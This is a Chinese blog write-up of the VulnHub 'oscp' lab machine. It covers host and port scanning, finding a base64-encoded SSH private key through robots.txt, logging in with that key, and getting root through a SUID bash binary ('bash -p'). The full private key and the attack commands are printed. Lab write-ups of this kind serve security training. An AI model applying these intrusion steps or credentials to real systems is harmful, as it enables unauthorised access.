首页 > 其他分享 >vulnhub oscp

vulnhub oscp

时间:2024-08-08 09:53:02浏览次数:5  
标签:bin core18 2829 1439 usr snap oscp vulnhub

信息搜集

首先探测内网存活主机

nmap -sP 192.168.19.128/24

发现存活主机192168.19.140,然后扫描开放端口

nmap -p- 192.168.19.140

结果如下

22/tcp    open  ssh
80/tcp    open  http
33060/tcp open  mysqlx

这个mysqlx端口肯定是有说法的.访问80端口

渗透

发现下面的一段话
Heya! Welcome to the hunt.
In order to enter the give away, you must obtain the root flag located in /root/. Once you’ve obtained the flag, message the TryHarder bot with the command !flag <insert flag>. It will then validate the flag for verification. Should it be incorrect, it will let you know. If it’s correct, you will be given a new role on the server where you can chat with others in a private channel. Once you’ve received the role you are entered into the give away!
You must be a member of the server in order to use the command above.
For those downloading this box off vulnhub at a later time, the command above will no longer be available.
Oh yea! Almost forgot the only user on this box is “oscp”.
A big thank you to Offensive Security for providing the voucher.
Happy Hunting
-FalconSpy & InfoSec Prep Discord Server
上面的内容中包含有效信息:用户名为oscp,只有这一个用户,需要获得到root下的flag,然后通过!flag \<insert flag\>命令创建一个新的用户完成本次任务
使用whatweb进行指纹识别

whatweb -v 192.168.19.140

发现是WordPress 5.4.2,使用wpscan扫,没扫出来.使用dirsearch扫,发现有robots.txt文件.我们访问发现内容如下:
User-Agent: *
Disallow: /secret.txt
访问secret.txt,发现是经过base64进行编码了的,解码内容如下

-----BEGIN OPENSSH PRIVATE KEY-----
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
8nfK2oDc6LfrDmjQAAAAlvc2NwQG9zY3A=
-----END OPENSSH PRIVATE KEY-----

是一个ssh私钥文件.我们将其写入kali.注意:ssh相关的权限控制比较严格,通常私钥600,仅所有者可读写;公钥644,所有者读写,其他人可读;存储秘钥的.ssh目录为700,仅所有者可读写执行.
我们修改权限为600,然后ssh连接,并用pty升级bash

ssh -i key [email protected]
python3 -c 'import pty;pty.spawn("/bin/bash")'
提权

发现当前目录有一个叫ip的文件,查看发现内容如下

#!/bin/sh
cp /etc/issue-standard /etc/issue
/usr/local/bin/get-ip-address >> /etc/issue

可以看出是一个bash脚本,查看脚本权限

-rwxr-xr-x 1 root root 88 Jul  9  2020 ip

发现这东西挺有说法的,能够让普通用户以root权限去执行脚本,然而不能写,没啥用.
尝试使用suid提权

find / -user root -perm -4000 -print 2>/dev/null

结果如下

/snap/core22/1439/usr/bin/chfn
/snap/core22/1439/usr/bin/chsh
/snap/core22/1439/usr/bin/gpasswd
/snap/core22/1439/usr/bin/mount
/snap/core22/1439/usr/bin/newgrp
/snap/core22/1439/usr/bin/passwd
/snap/core22/1439/usr/bin/su
/snap/core22/1439/usr/bin/sudo
/snap/core22/1439/usr/bin/umount
/snap/core22/1439/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core22/1439/usr/lib/openssh/ssh-keysign
/snap/core22/1439/usr/libexec/polkit-agent-helper-1
/snap/snapd/21759/usr/lib/snapd/snap-confine
/snap/core18/2829/bin/mount
/snap/core18/2829/bin/ping
/snap/core18/2829/bin/su
/snap/core18/2829/bin/umount
/snap/core18/2829/usr/bin/chfn
/snap/core18/2829/usr/bin/chsh
/snap/core18/2829/usr/bin/gpasswd
/snap/core18/2829/usr/bin/newgrp
/snap/core18/2829/usr/bin/passwd
/snap/core18/2829/usr/bin/sudo
/snap/core18/2829/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/2829/usr/lib/openssh/ssh-keysign
/snap/core18/1754/bin/mount
/snap/core18/1754/bin/ping
/snap/core18/1754/bin/su
/snap/core18/1754/bin/umount
/snap/core18/1754/usr/bin/chfn
/snap/core18/1754/usr/bin/chsh
/snap/core18/1754/usr/bin/gpasswd
/snap/core18/1754/usr/bin/newgrp
/snap/core18/1754/usr/bin/passwd
/snap/core18/1754/usr/bin/sudo
/snap/core18/1754/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/1754/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/fusermount
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/bash
/usr/bin/pkexec
/usr/bin/umount
/usr/bin/chsh
/usr/bin/su

我们发现/usr/bin/bash有suid位,执行命令

/usr/bin/bash -p

能够以管理员身份得到一个shell,实现提权,得到flag

标签:bin,core18,2829,1439,usr,snap,oscp,vulnhub
From: https://www.cnblogs.com/meraklbz/p/18348335

相关文章

  • VulnhubJANGOW靶机详解
    项目地址https://www.vulnhub.com/entry/jangow-101754/部分vmware有配置问题,需要修改网卡信息,重启dhcp服务1.在系统启动时(长按shift键)直到显示以下界面选择第二个,按回车继续选择第二个2.按e进入编辑,进入以下界面删除"recoverynomodeset"并在末尾添加"quiets......
  • 【Vulnhub系列】Vulnhub Noob 靶场渗透(原创)
    【Vulnhub系列靶场】VulnhubNoob靶场渗透原文转载已经过授权原文链接:Lusen的小窝-学无止尽,不进则退(lusensec.github.io)一、主机发现二、端口扫描有一个go.php的form表单接收文件这里识别21端口存在未授权,55077是ssh的服务端口三、web渗透1、web信息收......
  • Vulnhub靶场DC-9练习
    目录0x00准备0x01主机信息收集0x02站点信息收集0x03漏洞查找与利用1.发现SQL注入点2.Sqlmap跑数据3.文件包含4.SSH爆破+端口敲门服务5.提权(写入/etc/passwd)0x04总结0x00准备下载链接:https://download.vulnhub.com/dc/DC-9.zip介绍:Theultimategoal......
  • VulnhubAI-web 1.0靶机详解
    项目地址https://www.vulnhub.com/entry/ai-web-1,353/实验过程将下载好的靶机导入到VMware中,设置网络模式为NAT模式,然后开启靶机虚拟机使用nmap进行主机发现,获取靶机IP地址nmap192.168.47.1-254根据对比可知DC-8的一个ip地址为192.168.47.135扫描Ai-Web......
  • Vulnhub靶机:JANGOW_ 1.0.1
    目录前言:一、安装虚拟机Jangow:1.0.1靶机二、Web部分前言:难度:简单,本文使用VirtualBox打开,下载地址:https://download.vulnhub.com/jangow/jangow-01-1.0.1.ova一、安装虚拟机Jangow:1.0.1靶机1.选择下载的Jangow:1.0.1的文件路径。不要放C盘,不要放C盘。放在自己能记住......
  • 【Vulnhub系列】Vulnhub_Dr4g0n_b4ll 靶场渗透(原创)
    【Vulnhub系列靶场】Vulnhub_Dr4g0n_b4ll靶场渗透原文转载已经过授权原文链接:Lusen的小窝-学无止尽,不进则退(lusensec.github.io)一、环境搭建选择打开.ovf文件配置名称和路径打开后调整网络连接模式为【NAT】即可二、信息收集1、主机发现nmap.exe-sn192.1......
  • 【Vulnhub靶机之Hackme】
     第一步:打开靶机 第二步:查看虚拟靶机ip、第三步:查看连接80端口的ip第四步:扫描出靶机的ip地址第五步:扫描靶机地址下的目录访问login.php目录点击注册点击,可以看到许多的书名 第六步:使用burpsuite抓包在111后面加*号保存抓到的文件为post.txt第七步:使用......
  • 【Vulnhub靶场AI-WEB-1.0打靶教程】
     第一步:查看虚拟机的ip第二步:扫描ip下开放的80端口第三步:扫描查到的ip地址下的目录第四步:访问查到的目录访问robot.txt第五步:访问robot.txt显示出的目录第六步:打开kali终端,使用sqlmap功能sqlmap-u"http://192.168.189.153/se3reTdir777/index.php"-data"uid=......
  • 【Vulnhub靶机tomato渗透】
    第一步:端口扫描我使用的是webrobot访问这个ip,就是它了 第二步:目录扫描打开kali使用dirb命令扫描http://192.168.189.154下的目录dirbhttp://192.168.189.154扫描到目录。第三步:访问目录地址看到有几个php的文件第四步:查看访问php的文件我查看的antibot.php是......
  • 【Vulnhub系列】Vulnhub_SecureCode1靶场渗透(原创)
    【Vulnhub系列靶场】Vulnhub_SecureCode1靶场渗透原文转载已经过授权原文链接:Lusen的小窝-学无止尽,不进则退(lusensec.github.io)一、环境配置1、从百度网盘下载对应靶机的.ova镜像2、在VM中选择【打开】该.ova3、选择存储路径,并打开4、之后确认网络连接模式是......